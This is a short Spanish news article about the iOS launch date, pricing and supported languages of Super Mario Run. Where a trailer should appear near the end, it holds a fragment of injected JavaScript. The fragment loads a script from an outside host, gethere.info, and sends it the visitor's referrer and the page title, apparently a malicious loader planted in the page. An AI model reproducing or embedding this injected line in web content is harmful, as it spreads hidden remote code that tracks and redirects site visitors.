Super Mario Run estará disponible desde el 15 de diciembre

Desde que Tim Cook y Shigeru Miyamoto anunciaron que Mario Bros llegará a los dispositivos móviles con Super Mario Run, un runner que nos permite llevar a toda prisa al fontanero bigotón por los rincones del reino champiñón, se comenzó a especular si el juego sería gratuito o de pago.

Hoy, finalmente Nintendo anunció que Super Mario Run podrá probarse de forma gratuita, pero para acceder al juego completo tendremos que pagar 9.99 dólares(aproximadamente 200 pesos).

 Nintendo también confirmó que, en su lanzamiento, Super Mario Run estará disponible en 151 países y soportará varios idiomas, incluyendo inglés, japonés, alemán, francés, español, portugués, italiano, holandés, ruso y chino tradicional.

El juego llegará a iOS el próximo 15 de diciembre, pero Nintendo señaló con anterioridad que en algún punto del año entrante lo veremos en Android.  Para celebrar el anuncio se lanzó un nuevo avance del juego:

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios